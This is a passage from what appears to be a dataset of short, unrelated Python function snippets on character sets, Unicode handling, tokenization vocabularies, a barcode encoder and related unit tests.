test_value_special_chars(self):\n raw = [\n 0x48,\n 0x65,\n 0x79,\n 0x21,\n 0x3F,\n 0x24,\n 0x20,\n 0xC4,\n 0xD6,\n 0xDC,\n 0xE4,\n 0xF6,\n 0xFC,\n 0xDF,\n ]\n string = \"Hey!?$ ÄÖÜäöüß\"\n self.assertEqual(DPTString.to_knx(string), raw)\n self.assertEqual(DPTString.from_knx(raw), string)", "def create_word(char_list):", "def preprocess_char(self):\n self.char_to_id, self.unk_char_list = self.build_vocab(mode=\"char\")\n self.subword_vocab_size = len(self.char_to_id)\n with open(self.sub_vocab_file, 'wb') as f:\n pickle.dump((self.char_to_id, self.unk_char_list, self.max_word_len), f)", "def char_mapping(sentences):\n chars = [\"\".join([w[0] for w in s]) for s in sentences]\n dico = create_dico(chars)\n dico['<PAD>'] = 10000000\n # dico[';'] = 0\n char_to_id, id_to_char = create_mapping(dico)\n print(\"Found %i unique characters\" % len(dico))\n return dico, char_to_id, id_to_char", "def makeCode(self, code):\n\n current_charset = None\n pos = sum = 0\n skip = False\n strCode = ''\n for c in range(len(code)):\n if skip:\n skip = False\n continue\n\n # Only switch to char set C if next four chars are digits\n if len(code[c:]) >= 4 and code[c:c + 4].isdigit() and current_charset != self.CharSetC or \\\n len(code[c:]) >= 2 and code[c:c + 2].isdigit() and current_charset == self.CharSetC:\n # If char set C = current and next two chars ar digits, keep C\n if current_charset != self.CharSetC:\n # Switching to Character set C\n if pos:\n strCode += self.ValueEncodings[current_charset['Code C']]\n sum += pos * current_charset['Code C']\n else:\n strCode = self.ValueEncodings[self.CharSetC['START C']]\n sum = self.CharSetC['START C']\n current_charset = self.CharSetC\n pos += 1\n elif code[c] in self.CharSetB and current_charset != self.CharSetB and \\\n not (code[c] in self.CharSetA and current_charset == self.CharSetA):\n # 
If char in chrset A = current, then just keep that\n # Switching to Character set B\n if pos:\n strCode += self.ValueEncodings[current_charset['Code B']]\n sum += pos * current_charset['Code B']\n else:\n strCode = self.ValueEncodings[self.CharSetB['START B']]\n sum = self.CharSetB['START B']\n current_charset = self.CharSetB\n pos += 1\n elif code[c] in self.CharSetA and current_charset != self.CharSetA and \\\n not (code[c] in self.CharSetB and current_charset == self.CharSetB):\n # if char in chrset B== current, then just keep that\n # Switching to Character set A\n if pos:\n strCode += self.ValueEncodings[current_charset['Code A']]\n sum += pos * current_charset['Code A']\n else:\n strCode += self.ValueEncodings[self.CharSetA['START A']]\n sum = self.CharSetA['START A']\n current_charset = self.CharSetA\n pos += 1\n\n if current_charset == self.CharSetC:\n val = self.CharSetC[code[c:c + 2]]\n skip = True\n else:\n val = current_charset[code[c]]\n\n sum += pos * val\n strCode += self.ValueEncodings[val]\n pos += 1\n\n # Checksum\n checksum = sum % 103\n\n strCode += self.ValueEncodings[checksum]\n\n # The stop character\n strCode += self.ValueEncodings[current_charset['STOP']]\n\n # Termination bar\n strCode += \"11\"\n\n return strCode", "def test_vars_generator(self):\n iterator = vars_generator()\n\n for char_number in range(ord('a'), ord('z') + 1):\n self.assertEqual(next(iterator), chr(char_number))\n self.assertEqual(next(iterator), 'aa')", "def test_unicodeBasic(self):\n input = raw_unicode(\n r\"Ik ben ge\\u00EFnteresseerd in de co\\u00F6rdinatie van mijn knie\\u00EBn, maar kan niet \\u00E9\\u00E9n \\u00E0 twee enqu\\u00EAtes vinden die recht doet aan mijn carri\\u00E8re op Cura\\u00E7ao\")\n output = input.split(\" \")\n output[8] = output[8][0:-1]\n for (itmO, itmV) in zip(output, tokenize_en(input)):\n self.assertEqual(itmO, itmV[0])\n self.assertTrue(input[itmV[1]:].startswith(itmO))", "def __init__(self):\n self.charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n self.mapping = [ch for ch in self.charset]\n shuffle(self.mapping)\n super().__init__(self.mapping)", "def ring_characters(self):\n return self._charset", "def __init__(self):\n self.chars = {}\n self.end_of_word = '#'", "def gen_chars(self, lines_str_list):\n char_index_counter = 0\n chars = VGroup()\n for line_no in range(lines_str_list.__len__()):\n chars.add(VGroup())\n chars[line_no].add(\n *self.lines_text.chars[\n char_index_counter : char_index_counter\n + lines_str_list[line_no].__len__()\n + 1\n ]\n )\n char_index_counter += lines_str_list[line_no].__len__() + 1\n return chars", "def _create_unicode_map():\n unicode_map = {}\n\n for beta, uni in _map.BETACODE_MAP.items():\n # Include decomposed equivalent where necessary.\n norm = unicodedata.normalize('NFC', uni)\n unicode_map[norm] = beta\n unicode_map[uni] = beta\n\n # Add the final sigmas.\n final_sigma_norm = unicodedata.normalize('NFC', _FINAL_LC_SIGMA)\n unicode_map[final_sigma_norm] = 's'\n unicode_map[_FINAL_LC_SIGMA] = 's'\n\n return unicode_map", "def char_mapping(sentences, lower):\n chars = [[x[0].lower() if lower else x[0] for x in s] for s in sentences]\n dico = create_dico(chars)\n dico[\"<PAD>\"] = 10000001\n dico['<UNK>'] = 10000000\n char_to_id, id_to_char = create_mapping(dico)\n print(\"Found %i unique words (%i in total)\" % (\n len(dico), sum(len(x) for x in chars)\n ))\n return dico, char_to_id, id_to_char", "def test_multiple_char_unique(self):\n self.assertTrue(all_unique_chars_no_set(\"ab\"))\n 
self.assertTrue(all_unique_chars_no_set(\"ba\"))\n self.assertTrue(all_unique_chars_no_set(\"make\"))\n self.assertTrue(all_unique_chars_no_set(\"thorn\"))\n self.assertTrue(all_unique_chars_no_set(\"malibu\"))\n self.assertTrue(all_unique_chars_no_set(string.ascii_letters))", "def preprocess_morpheme(self):\n self.char_to_id, self.unk_char_list = self.build_vocab(mode=\"char\")\n self.morpheme_to_id, self.unk_morph_list, self.max_morph_per_word = self.build_morpheme_vocab()\n for ch in self.char_to_id:\n if ch not in self.morpheme_to_id:\n self.morpheme_to_id[ch] = len(self.morpheme_to_id)\n self.subword_vocab_size = len(self.morpheme_to_id)\n with open(self.sub_vocab_file, 'wb') as f:\n pickle.dump((self.morpheme_to_id, self.unk_char_list, self.unk_morph_list, self.max_morph_per_word), f)", "def find_unicode(self, modifier=4):\n wide = []\n matches = re.finditer(b'([\\x20-\\x7e]\\x00){' +\n str(modifier).encode('ascii') + b',}', self.buff)\n\n if matches:\n for m in matches:\n wide.append(m.group(0).decode('utf-16'))\n return wide", "def decode(self, coded_set):", "def __get_utl_charset(self, url_content):\n pass", "def create_dictionary():\n chars = sorted(ch for ch in string.printable if ch not in (\"\\x0b\", \"\\x0c\", \"\\r\"))\n char2id = dict((ch, i + 1) for i, ch in enumerate(chars))\n char2id.update({\"\": 0})\n id2char = dict((char2id[ch], ch) for ch in char2id)\n vocab_size = len(char2id)\n id2char.update({98:'\\\\unk',99:'\\\\unk'})\n return char2id, id2char, vocab_size,chars", "def test_unicode_attribute(Script):\n s1 = ('#-*- coding: utf-8 -*-\\nclass Person():\\n'\n ' name = \"e\"\\n\\nPerson().name.')\n completions1 = Script(s1).complete()\n assert 'strip' in [c.name for c in completions1]\n s2 = ('#-*- coding: utf-8 -*-\\nclass Person():\\n'\n ' name = \"é\"\\n\\nPerson().name.')\n completions2 = Script(s2).complete()\n assert 'strip' in [c.name for c in completions2]", "def _get_unique_chars(self, data_string):\n unique_chars = list(set(data_string))\n return unique_chars", "def latin(minimum=3, maximum=8, separator=' '):\n \n genus = ''.join(random.sample(string.ascii_lowercase, random.randint(3, 8)))\n epithet = ''.join(random.sample(string.ascii_lowercase, random.randint(3, 8)))\n return separator.join([genus.title(), epithet])", "def _splitbycharset(txt, charset):\n for firstpos, char in enumerate(txt):\n if char in charset:\n return txt[firstpos], txt[:firstpos], txt[firstpos + 1:]\n return '', txt, ''", "def test_unicode_parenthization():\n alpha = symbols('alpha')\n printer = SympyUnicodePrinter()\n printer.parenthesize(alpha, 0) == 'α'", "def test_vars_generator_with_taken_vars(self):\n iterator = vars_generator({'a', 'b'})\n\n for char_number in range(ord('c'), ord('z') + 1):\n self.assertEqual(next(iterator), chr(char_number))\n self.assertEqual(next(iterator), 'aa')", "def label(mi_, ma_):\n\treturn \"caractères Unicode des points de code {} à {}\".format(mi_, ma_)", "def preprocess_char_ngram(self):\n self.char_to_id, self.unk_char_list = self.build_vocab(mode=\"char\")\n self.ngram_to_id, self.unk_ngram_list, self.max_ngram_per_word = self.build_ngram_vocab(self.n)\n for ch in self.char_to_id:\n if ch not in self.ngram_to_id:\n self.ngram_to_id[ch] = len(self.ngram_to_id)\n self.subword_vocab_size = len(self.ngram_to_id)\n with open(self.sub_vocab_file, 'wb') as f:\n pickle.dump((self.ngram_to_id, self.unk_char_list, self.unk_ngram_list, self.max_ngram_per_word), f)", "def _map_characters_to_subwords(self, input_ids: List[int], input_ids_for_subwords: 
List[int]) -> List[int]:\n character_pos_to_subword_pos = [0 for _ in input_ids]\n\n ## '[CLS]', 'a', 's', 't', 'r', 'o', 'n', 'o', 'm', 'e', 'r', 's', '_', 'd', 'i', ..., 'l', 'o', '[SEP]', 'd', 'i', 'd', 'i', 'e', 'r', '_', 's', 'a', 'u', 'm', 'o', 'n', ..., '[SEP]'\n tokens = self._tokenizer.convert_ids_to_tokens(input_ids)\n ## '[CLS]', 'astronomers', 'did', '##ie', 'so', '##mon', 'and', 'tri', '##sti', '##an', 'g', '##llo', '[SEP]', 'did', '##ier', 'sa', '##um', '##on', '[SEP]', 'astro', '##no', '##mie', '[SEP]', 'tristan', 'gui', '##llo', '##t', '[SEP]', ..., '[SEP]', 'mercy', '[SEP]']\n tokens_for_subwords = self._tokenizer.convert_ids_to_tokens(input_ids_for_subwords)\n j = 0 # index for tokens_for_subwords\n j_offset = 0 # current letter index within subword\n for i in range(len(tokens)):\n character = tokens[i]\n subword = tokens_for_subwords[j]\n if character == \"[CLS]\" and subword == \"[CLS]\":\n character_pos_to_subword_pos[i] = j\n j += 1\n continue\n if character == \"[SEP]\" and subword == \"[SEP]\":\n character_pos_to_subword_pos[i] = j\n j += 1\n continue\n if character == \"[CLS]\" or character == \"[SEP]\" or subword == \"[CLS]\" or subword == \"[SEP]\":\n raise IndexError(\n \"character[\"\n + str(i)\n + \"]=\"\n + character\n + \"; subword[\"\n + str(j)\n + \";=\"\n + subword\n + \"subwords=\"\n + str(tokens_for_subwords)\n )\n # At this point we expect that\n # subword either 1) is a normal first token of a word or 2) starts with \"##\" (not first word token)\n # character either 1) is a normal character or 2) is a space character \"_\"\n if character == \"_\":\n character_pos_to_subword_pos[i] = j - 1 # space is assigned to previous subtoken\n continue\n if j_offset < len(subword):\n if character == subword[j_offset]:\n character_pos_to_subword_pos[i] = j\n j_offset += 1\n else:\n raise IndexError(\n \"character mismatch:\"\n + \"i=\"\n + str(i)\n + \"j=\"\n + str(j)\n + \"j_offset=\"\n + str(j_offset)\n + \"; len(tokens)=\"\n + str(len(tokens))\n + \"; len(subwords)=\"\n + str(len(tokens_for_subwords))\n )\n # if subword is finished, increase j\n if j_offset >= len(subword):\n j += 1\n j_offset = 0\n if j >= len(tokens_for_subwords):\n break\n if tokens_for_subwords[j].startswith(\"##\"):\n j_offset = 2\n # check that all subword tokens are processed\n if j < len(tokens_for_subwords):\n raise IndexError(\n \"j=\"\n + str(j)\n + \"; len(tokens)=\"\n + str(len(tokens))\n + \"; len(subwords)=\"\n + str(len(tokens_for_subwords))\n )\n return character_pos_to_subword_pos", "def prepare_set(text, max_length=64):\n global tokenizer\n\n text = [ preprocess_text(t) if set_id != \"gr\" else strip_accents_and_lowercase(preprocess_text(t)) for t in text ]\n t = tokenizer.batch_encode_plus(text,\n pad_to_max_length=True,\n add_special_tokens=True,\n max_length=max_length,\n return_tensors='pt')\n\n return t[\"input_ids\"], t[\"attention_mask\"], t[\"token_type_ids\"]", "def get_vocab(shi):\n \n # 构建字与id的相互映射\n id2char = dict(enumerate(set(''.join(shi))))\n char2id = {j:i for i,j in id2char.items()}\n print(f'length {len(id2char)}')\n\n \n return id2char, char2id", "def test_given_alphabet_has_code_for_each_character():\n codes = set()\n for char in MORSE_CODE_ALPHABET:\n assert char in MORSE_CHAR_DICT\n codes.add(MORSE_CHAR_DICT[char])\n assert len(codes) == len(MORSE_CODE_ALPHABET)", "def _decode_multiple_subject(self, decoded: str) -> Set[str]:\n\n result = set()\n\n rematch = self._regex_helper.set_regex(r\"((?:[^~\\*,]+))\").match(\n decoded, rematch=True, 
return_match=True\n )\n\n if rematch:\n result.update({self.extract_base(x) for x in rematch})\n\n return result", "def display_characters(self):\n return f'{self.character_set}'", "def test_annotate_text_utf32_directly_index_into_unicode():\n test_string = \"a \\u00e3 \\u0201 \\U0001f636 b\"\n result = analyze.analyze_syntax(test_string, encoding=\"UTF32\")\n tokens = result[\"tokens\"]\n\n assert tokens[0][\"text\"][\"content\"] == \"a\"\n offset = tokens[0][\"text\"].get(\"beginOffset\", 0)\n assert test_string[offset] == tokens[0][\"text\"][\"content\"]\n\n assert tokens[1][\"text\"][\"content\"] == \"\\u00e3\"\n offset = tokens[1][\"text\"].get(\"beginOffset\", 0)\n assert test_string[offset] == tokens[1][\"text\"][\"content\"]\n\n assert tokens[2][\"text\"][\"content\"] == \"\\u0201\"\n offset = tokens[2][\"text\"].get(\"beginOffset\", 0)\n assert test_string[offset] == tokens[2][\"text\"][\"content\"]\n\n # Temporarily disabled\n # assert tokens[3]['text']['content'] == u'\\U0001f636'\n # offset = tokens[3]['text'].get('beginOffset', 0)\n # assert test_string[offset] == tokens[3]['text']['content']\n\n # assert tokens[4]['text']['content'] == u'b'\n # offset = tokens[4]['text'].get('beginOffset', 0)\n # assert test_string[offset] == tokens[4]['text']['content']", "def character_map(text):\n\n print(f\"Total character count: {len(text)}\\n\")\n\n characters = sorted(list(set(text))) # Get sorted list of individual characters\n n_to_char = {}\n char_to_n = {}\n\n num = 0\n for char in characters:\n n_to_char[num] = char\n char_to_n[char] = num\n num += 1\n\n return characters, n_to_char, char_to_n", "def _hidden_in_unicode(self, txt):", "def __init__(self) -> None:\n self.hebrew_alphabet = None # list of hebrew characters\n self.augmenter = Augmenter()", "def __init__(self):\n self.i, self.pool = 0, list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')", "def __init__(self):\n self.iteration_deep = 0\n self.max_iteration_deep = 2\n self.max_dict_key_length = 10\n self.max_string_length = 20\n self.dict_key_characters = string.ascii_lowercase + string.ascii_uppercase + \"_\"\n self.string_value_characters = (string.ascii_lowercase + string.ascii_uppercase +\n \"_\" + string.punctuation + \" \")", "def unicode2ascii(_unicrap):\n xlate = {0xc0:'A', 0xc1:'A', 0xc2:'A', 0xc3:'A', 0xc4:'A', 0xc5:'A',\n 0xc6:'Ae', 0xc7:'C',\n 0xc8:'E', 0xc9:'E', 0xca:'E', 0xcb:'E',\n 0xcc:'I', 0xcd:'I', 0xce:'I', 0xcf:'I',\n 0xd0:'Th', 0xd1:'N',\n 0xd2:'O', 0xd3:'O', 0xd4:'O', 0xd5:'O', 0xd6:'O', 0xd8:'O',\n 0xd9:'U', 0xda:'U', 0xdb:'U', 0xdc:'U',\n 0xdd:'Y', 0xde:'th', 0xdf:'ss',\n 0xe0:'a', 0xe1:'a', 0xe2:'a', 0xe3:'a', 0xe4:'a', 0xe5:'a',\n 0xe6:'ae', 0xe7:'c',\n 0xe8:'e', 0xe9:'e', 0xea:'e', 0xeb:'e',\n 0xec:'i', 0xed:'i', 0xee:'i', 0xef:'i',\n 0xf0:'th', 0xf1:'n',\n 0xf2:'o', 0xf3:'o', 0xf4:'o', 0xf5:'o', 0xf6:'o', 0xf8:'o',\n 0xf9:'u', 0xfa:'u', 0xfb:'u', 0xfc:'u',\n 0xfd:'y', 0xfe:'th', 0xff:'y',\n 0xa1:'!', 0xa2:'{cent}', 0xa3:'{pound}', 0xa4:'{currency}',\n 0xa5:'{yen}', 0xa6:'|', 0xa7:'{section}', 0xa8:'{umlaut}',\n 0xa9:'{C}', 0xaa:'{^a}', 0xab:'<<', 0xac:'{not}',\n 0xad:'-', 0xae:'{R}', 0xaf:'_', 0xb0:'{degrees}',\n 0xb1:'{+/-}', 0xb2:'{^2}', 0xb3:'{^3}', 0xb4:\"'\",\n 0xb5:'{micro}', 0xb6:'{paragraph}', 0xb7:'*', 0xb8:'{cedilla}',\n 0xb9:'{^1}', 0xba:'{^o}', 0xbb:'>>',\n 0xbc:'{1/4}', 0xbd:'{1/2}', 0xbe:'{3/4}', 0xbf:'?',\n 0xd7:'*', 0xf7:'/'\n }\n\n s = \"\"\n for i in _unicrap:\n ordi = ord(i)\n if ordi in xlate:\n s += xlate[ordi]\n elif ordi >= 0x80:\n pass\n else:\n s += str(i)\n return s", "def 
__init__(self, shift):\n self.charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n self.mapping = [\n chr((k + shift) % len(self.charset) + ord(self.charset[0]))\n for k in range(len(self.charset))\n ]\n super().__init__(self.mapping)", "def unicode_cap(cap):\n return tigetstr(cap).decode('latin1')", "def characters():\n\n letter = \"a b c d e f g h i j k l m n o p q r s t u v w x y z\".split()\n sc = \"! @ # $ % ^ & * ( ) _ - + = ? : ;\".split()\n\n\n chars = []\n chars.append(random.choice(letter))\n chars.append(random.choice(letter).upper())\n chars.append(str(random.randint(0,9)))\n chars.append(random.choice(sc))\n\n return chars", "def test_multiple_char_not_unique(self):\n self.assertFalse(all_unique_chars_no_set(\"aa\"))\n self.assertFalse(all_unique_chars_no_set(\"alabama\"))\n self.assertFalse(all_unique_chars_no_set(\"Ricardio\"))\n self.assertFalse(all_unique_chars_no_set(\"aardvark\"))\n self.assertFalse(all_unique_chars_no_set(\"Zimbabwe\"))\n self.assertFalse(all_unique_chars_no_set(\"....What?....\"))", "def __init__(self, config, sqc):\n\t\tself.sqc = sqc\n\t\tself.config = config\n\t\t\n\t\tif ( self.config.useunicode ) :\n\t\t\tself.A176 = unichr(9617).encode('UTF-8')\n\t\t\tself.A177 = unichr(9618).encode('UTF-8')\n\t\t\tself.A178 = unichr(9619).encode('UTF-8')\n\t\t\tself.A219 = unichr(9608).encode('UTF-8')\n\t\t\tself.A220 = unichr(9604).encode('UTF-8')\n\t\t\tself.A221 = unichr(9612).encode('UTF-8')\n\t\t\tself.A222 = unichr(9616).encode('UTF-8')\n\t\t\tself.A223 = unichr(9600).encode('UTF-8')\n\t\t\tself.A254 = unichr(9642).encode('UTF-8')\n\t\telse:\n\t\t\tself.A176 = unichr(176).encode('latin-1')\n\t\t\tself.A177 = unichr(177).encode('latin-1')\n\t\t\tself.A178 = unichr(178).encode('latin-1')\n\t\t\tself.A219 = unichr(219).encode('latin-1')\n\t\t\tself.A220 = unichr(220).encode('latin-1')\n\t\t\tself.A221 = unichr(221).encode('latin-1')\n\t\t\tself.A222 = unichr(222).encode('latin-1')\n\t\t\tself.A223 = unichr(223).encode('latin-1')\n\t\t\tself.A254 = unichr(254).encode('latin-1')\n\n\t\tself.ESC = \"\\x1b[\"", "def load_zero_widths() -> \"list[bool]\":\n with fetch_open(\"UnicodeData.txt\") as categories:\n zw_map = []\n current = 0\n for line in categories.readlines():\n if len(raw_data := line.split(\";\")) != 15:\n continue\n [codepoint, name, cat_code] = [\n int(raw_data[0], 16),\n raw_data[1],\n raw_data[2],\n ]\n zero_width = cat_code in [\"Cc\", \"Cf\", \"Mn\", \"Me\"]\n\n assert current <= codepoint\n while current <= codepoint:\n if name.endswith(\", Last>\") or current == codepoint:\n # if name ends with Last, we backfill the width value to all codepoints since\n # the previous codepoint (aka the start of the range)\n zw_map.append(zero_width)\n else:\n # unassigned characters are implicitly given Neutral width, which is nonzero\n zw_map.append(False)\n current += 1\n\n while len(zw_map) < NUM_CODEPOINTS:\n # Catch any leftover codepoints. 
They must be unassigned (so nonzero width)\n zw_map.append(False)\n\n return zw_map", "def gen_char_list(readpath, savepath, font_data):\n # txt内の文字をカウントしていく\n filelist = os.listdir(readpath)\n chardict = {}\n for filepath in filelist:\n file = open(readpath + filepath)\n for line in file:\n for char in line.replace('\\n', ''):\n if char in chardict:\n chardict[char] += 1\n else:\n chardict[char] = 1\n\n # カウント数でソートして多い順にラベル化\n # TODO if frequency is same, sorted by number of shift-jis code\n char_list = []\n for key, value in sorted(chardict.items(), key=lambda x: x[1]):\n char_list.append([key, font_data.width(key), value])\n char_list.reverse()\n\n for key, item in enumerate(char_list): # TODO remove if bag fixed\n if item[1]==0:\n char_list[key][1] = 16\n\n for item in char_list:\n print(item)\n # 保存\n with open(savepath, 'wb') as f: # TODO CSV形式化\n pickle.dump(char_list, f)\n\n print('saved ', savepath, ' number of character is ', len(char_list))", "def init_dict() -> None:\n for elem in letters:\n ascii_dict[elem] = []\n for elem in numbers:\n ascii_dict[elem] = []\n for elem in symbols:\n ascii_dict[elem] = []", "def __init__(self):\n self.digits = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'\n self.digpos = {}\n for pos, dig in enumerate(self.digits):\n self.digpos[dig] = pos", "def report_charset(self):\n print fmt(\"[charset]\", MAGENTA)\n print fmt(sorted([x for x in self.charset]), WHITE)\n print\n print fmt(\"[ignores]\", MAGENTA)\n print fmt(sorted([x for x in self.ignores]), WHITE)", "def read_chars(self):\n char_data = []\n for word in self.train_data:\n if word == self.eos or word == self.sos:\n continue\n if self.unit == \"oracle\":\n if '+' in word:\n tags = word.split('+')\n word_tag = tags[0].split(':')\n word = word_tag[1]\n if self.unit == \"morpheme\":\n word = re.sub(\"@@\", \"\", word)\n char_data.extend([ch for ch in word])\n return char_data", "def fill_charset(self, data):\n self.charset = get_optional_value(data, self.CHARSET, \"utf8mb4\")\n self.charset = self.charset or \"utf8mb4\"", "def __init__(self):\n self.vowels = u'あいうえお'\n self.consonants = u'かがさざただまはばぱなら'\n self.voiced_consonants = set(u'がだざびぴじばぱ')\n self._table = {\n u'あ': u'あいうえお',\n u'か': u'かきくけこ',\n u'が': u'がぎぐげご',\n u'さ': u'さしすせそ',\n u'ざ': u'ざじずぜぞ',\n u'た': u'たちつてと',\n u'だ': u'だぢづでど',\n u'ま': u'まみむめも',\n u'は': u'はひふへほ',\n u'ば': u'ばびぶべぼ',\n u'ぱ': u'ぱぴぷぺぽ',\n u'な': u'なにぬねの',\n u'ら': u'らりるれろ'\n }\n\n to_consonant_line = {}\n for c_line, elems in self._table.iteritems():\n to_consonant_line.update([(e, c_line) for e in elems])\n self._to_consonant_line = to_consonant_line\n\n to_vowel_line = {}\n for vowel_line in apply(zip, self._table.values()):\n vowel_line = list(sorted(vowel_line))\n vowel = vowel_line[0]\n to_vowel_line.update([(k, vowel) for k in vowel_line])\n self._to_vowel_line = to_vowel_line\n return", "def loadChars(file=os.path.join(os.path.dirname(__file__), \"character_set.txt\")):\r\n\r\n with open(file,\"r\") as f:\r\n return json.load(f)", "def test_opt_charsetWithRemainder(self):\n line = b\"CHARSET UTF-8 remainder\"\n identifier, remainder = self.server.opt_charset(line)\n self.assertEqual(identifier, b\"UTF-8\")\n self.assertEqual(remainder, b\"remainder\")", "def structure_data(characters):\n # Ignore superfluous diachritics and optional symbol\n IGNORE = [\"ˈ\", \"ˌ\", \"'\", \"̪\", \"̞\", \"ˣ\", \"̯\", \"-\", \"(\", \")\", \"[\", \"]\"]\n out = []\n for i, c in enumerate(characters):\n if c in IGNORE:\n continue\n # \"ː\" should be part of the 
character (no space between), also account for variation\n # in vowel length character used\n elif c == \"ː\" or c == \":\":\n out[-1] += \"ː\"\n # Do not add the optional characters, either (In Finnish seems to just be a glottal stop)\n elif i > 0 and characters[i-1] == \"(\" and characters[i + 1] == \")\":\n continue\n else:\n out.append(c)\n\n return ' '.join(out)", "def test_decode():\n assert TextCleaner().transform([[\"tést\"]])[\"corpus\"][0] == \"test\"", "def characters(self, data):\n pass", "def test_single_char(self):\n self.assertTrue(all_unique_chars_no_set(\"a\"))\n self.assertTrue(all_unique_chars_no_set(\"b\"))", "def test_bug2785373(self):\n input = \"So, one dey when I wes 17, I left.\"\n for _ in tokenize_en(input):\n pass\n input = raw_unicode(\"So, one dey when I wes 17, I left.\")\n for _ in tokenize_en(input):\n pass", "def enlabel(mi_, ma_):\n\treturn \"Unicode characters from {} to {} codepoints\".format(mi_, ma_)", "def prepare(self):\n\n for i in range(len(self.__corpora)):\n string = self.__corpora[i]\n string = sub(r'[\\n\\t]| {2,}', ' ', string.lower())\n string = sub(r'[^{0}]'.format(self.alphabet + ' '), '', string)\n\n if self.lang == 'uk':\n string = sub(r'[ґ]', 'г', string)\n\n elif self.lang == 'ru':\n string = sub(r'[ё]', 'е', string)\n\n self.__corpora[i] = string", "def test_encoding(self):\n\n for name in TEST_NAMES:\n self.colorspace.setEncoding(name)\n self.assertEqual(name, self.colorspace.getEncoding())", "def char_encoding(self, data):\n _buffer = list()\n for word in data:\n chars = self.word_to_chars(word)\n _buffer.append(self.padding(chars, self.max_word_len, self.char_to_id[\"<PAD>\"]))\n return _buffer", "def initial_finder(self, seq, ins):\n# print('call initial_finder, input = '+seq)\n letter=seq[0]\n if letter in ins:\n if letter in ['д','т','ц','с']:\n next_letter=seq[:2]\n if next_letter in ins:\n initial=next_letter\n len_init=2\n else:\n initial=letter\n len_init=1\n else:\n initial=letter\n len_init=1 \n else:\n initial='_'\n len_init=0\n# print(initial)\n return initial, len_init", "def get_map(self, chars):\n\n byte_offset = 0\n cb_map = {}\n\n for char_offset, char in enumerate(chars):\n cb_map[char_offset] = byte_offset\n byte_offset += len(char.encode('utf-8'))\n return cb_map", "def _init_dataset(self):\n chars = set()\n with open(self.file_path + \"/words.txt\", 'r') as input_file:\n for line in input_file:\n line_split = line.strip().split('\\t')\n file_name = self.file_path+\"/words/\"+line_split[1]\n gt_text = line_split[0]\n chars = chars.union(set(list(gt_text)))\n self.samples.append((file_name, gt_text))\n input_file.close()\n\n self.char_set = sorted(list(chars))", "def setUnicodeValue(glyph, glyphList):\n\n if glyph.name in glyphList:\n glyph.unicode = int(glyphList[glyph.name], 16)\n else:\n uvNameMatch = re.match(\"uni([\\dA-F]{4})$\", glyph.name)\n if uvNameMatch:\n glyph.unicode = int(uvNameMatch.group(1), 16)", "def _create_superscript_mapping():\n # 2 & 3 have different unicode superscript translations, so\n # we need to manually create different cases for them.\n # Also, 1 needs to be manually added with a different case.\n two_and_three = [2, 3]\n all_other_normal_nums = [0, *[i for i in range(4, 10)]]\n\n # Create the unicode superscripts for each of them.\n unicode_superscripts = [\n chr(0x2070 + i) for i in all_other_normal_nums]\n unicode_superscripts.extend(\n [chr(0x00B0 + i) for i in two_and_three])\n unicode_superscripts.append(chr(0x00B9))\n\n # Sort the list.\n normal, unicode = zip(*sorted(zip(\n 
[*all_other_normal_nums, *two_and_three, 1],\n unicode_superscripts)))\n\n # Convert the normal digits to strings.\n normal = [str(i) for i in normal]\n\n # Create a dict mapping the two.\n return DefaultDictionary(zip(normal, unicode))", "def _create_conversion_trie(strict):\n t = pygtrie.CharTrie()\n\n for beta, uni in _map.BETACODE_MAP.items():\n if strict:\n t[beta] = uni\n else:\n # The order of accents is very strict and weak. Allow for many orders of\n # accents between asterisk and letter or after letter. This does not\n # introduce ambiguity since each betacode token only has one letter and\n # either starts with a asterisk or a letter.\n diacritics = beta[1:]\n\n perms = itertools.permutations(diacritics)\n for perm in perms:\n perm_str = beta[0] + ''.join(perm)\n t[perm_str.lower()] = uni\n t[perm_str.upper()] = uni\n\n return t", "def test_issue3625():\n nlp = Hindi()\n doc = nlp(u\"hi. how हुए. होटल, होटल\")\n assert [token.text for token in doc] == ['hi', '.', 'how', 'हुए', '.', 'होटल', ',', 'होटल']", "def preprocess_sub_units(self):\n if self.unit == \"char\":\n self.preprocess_char()\n elif self.unit == \"char-ngram\":\n self.preprocess_char_ngram()\n elif self.unit == \"morpheme\":\n self.preprocess_morpheme()\n elif self.unit == \"oracle\":\n self.preprocess_oracle()\n else:\n sys.exit(\"Unknown unit\")", "def availchars(charactertype):\n\n # If the lowercase version of the character type is 'letters'\n if charactertype.lower() == 'letters':\n # Return the result\n return string.ascii_letters\n\n # If the lowercase version of the character type is 'lowercase'\n elif charactertype.lower() == 'lowercase':\n # Return the result\n return string.ascii_lowercase\n\n # If the lowercase version of the character type is 'uppercase'\n elif charactertype.lower() == 'uppercase':\n # Return the result\n return string.ascii_uppercase\n\n # If the lowercase version of the character type is 'digits'\n elif charactertype.lower() == 'digits':\n # Return the result\n return string.digits\n\n # If the lowercase version of the character type is 'hexdigits'\n elif charactertype.lower() == 'hexdigits':\n # Return the result\n return string.hexdigits\n\n # If the lowercase version of the character type is 'punctuation'\n elif charactertype.lower() == 'punctuation':\n # Return the result\n return string.punctuation\n\n # If the lowercase version of the character type is 'printable'\n elif charactertype.lower() == 'printable':\n # Return the result\n return string.printable\n\n # If the lowercase version of the character type is 'whitespace'\n elif charactertype.lower() == 'whitespace':\n # Return the result\n return string.whitespace\n\n # If the lowercase version of the character type is 'all'\n elif charactertype.lower() == 'all':\n # Return the result\n return string.ascii_letters + string.ascii_lowercase + string.ascii_uppercase + string.digits + string.hexdigits + string.punctuation + string.printable + string.whitespace\n\n # Raise a warning\n raise ValueError(\"Invalid character type provided.\")", "def create_character() -> list:\n return [0, 0]", "def buildTrainingSet(voc, bychar=True, maxlen=20, step=3):\n \n text, sym_indices, _ = voc\n sentences = []\n next_syms = []\n \n syms = set(text) # unique symbols (chars or words)\n \n for i in range(0, len(text) - maxlen, step):\n sentences.append(text[i: i + maxlen])\n next_syms.append(text[i + maxlen])\n print('nb sequences:', len(sentences))\n \n print('Vectorization...')\n X = np.zeros((len(sentences), maxlen, len(syms)), dtype=np.bool)\n 
